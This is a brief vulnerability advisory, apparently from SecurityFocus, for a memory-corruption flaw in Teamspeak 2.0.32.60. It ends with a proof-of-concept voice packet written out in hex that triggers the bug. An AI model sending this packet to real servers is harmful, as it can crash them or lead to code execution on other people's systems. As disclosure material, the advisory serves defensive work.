source: https://www.securityfocus.com/bid/44502/info
Teamspeak is prone to a memory-corruption vulnerability.
Attackers can exploit this issue by sending a specially crafted voice transmission packet containing malicious data.
Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.
Teamspeak version 2.0.32.60 is vulnerable.
The following proof-of-concept packet is available:
f2be000426ad7e00300000000001000a414141414141414141424141414141
4141414141414141414141414141414141414100ff99414141424242424141
414141414141414141